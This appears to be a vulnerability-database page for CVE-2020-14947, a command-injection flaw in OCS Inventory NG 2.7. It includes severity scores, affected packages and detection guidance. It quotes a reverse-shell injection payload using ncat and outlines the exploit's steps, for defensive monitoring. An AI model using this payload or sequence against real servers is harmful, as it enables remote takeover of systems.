cbcvebase.
CVE-2020-14947
published 2020-06-30

CVE-2020-14947: OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in…

PriorityP273high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
19.48%
97.0th percentile
OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.

Affected

2 ranges
VendorProductVersion rangeFixed in
debianocsinventory-server
factorfxopen_computer_software_inventory_next_generation

Detection & IOCsextracted from sources · hover to see the quote

pathrequire/commandLine/CommandLine.php
pathplugins/main_sections/ms_config/ms_snmp_config.php
url/index.php?function=admin_conf
url/index.php?function=SNMP_config
command; ncat -e /bin/bash %s %s #
  • Monitor POST requests to /index.php?function=admin_conf containing the parameter SNMP_MIB_DIRECTORY with shell metacharacters (e.g. semicolons, pipes, backticks) — this is the injection point used to plant the payload.
  • Monitor POST requests to /index.php?function=SNMP_config with parameter update_snmp=send — this is the trigger step that causes the injected SNMP_MIB_DIRECTORY value to be executed via get_mib_oid.
  • Alert on the SNMP_MIB_DIRECTORY field containing shell metacharacters (e.g. ';') followed by network tools such as ncat/nc/bash, indicating an attempted reverse shell injection.
  • The exploit follows a multi-step CSRF token harvesting sequence: it GETs admin_conf, POSTs to switch to SNMP onglet, then injects payload — look for this rapid sequential access pattern from a single session.
  • The vulnerable code path is get_mib_oid in ms_snmp_config.php passing mib_file unsanitised to CommandLine.php — monitor process spawning from the web server process involving shell commands after SNMP MIB upload/config actions.
  • ·Exploitation requires valid OCS Inventory NG credentials — the attacker must authenticate before injecting the payload. Brute-force or credential stuffing attempts against /index.php may precede exploitation.
  • ·The vulnerability is confirmed only in OCS Inventory NG version 2.7; the exploit was tested on Ubuntu 18.04 with PHP 7.2.24. Patched packages are available in Debian bookworm, bullseye, and sid.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
osv8.8HIGH
vendor_debian8.8LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.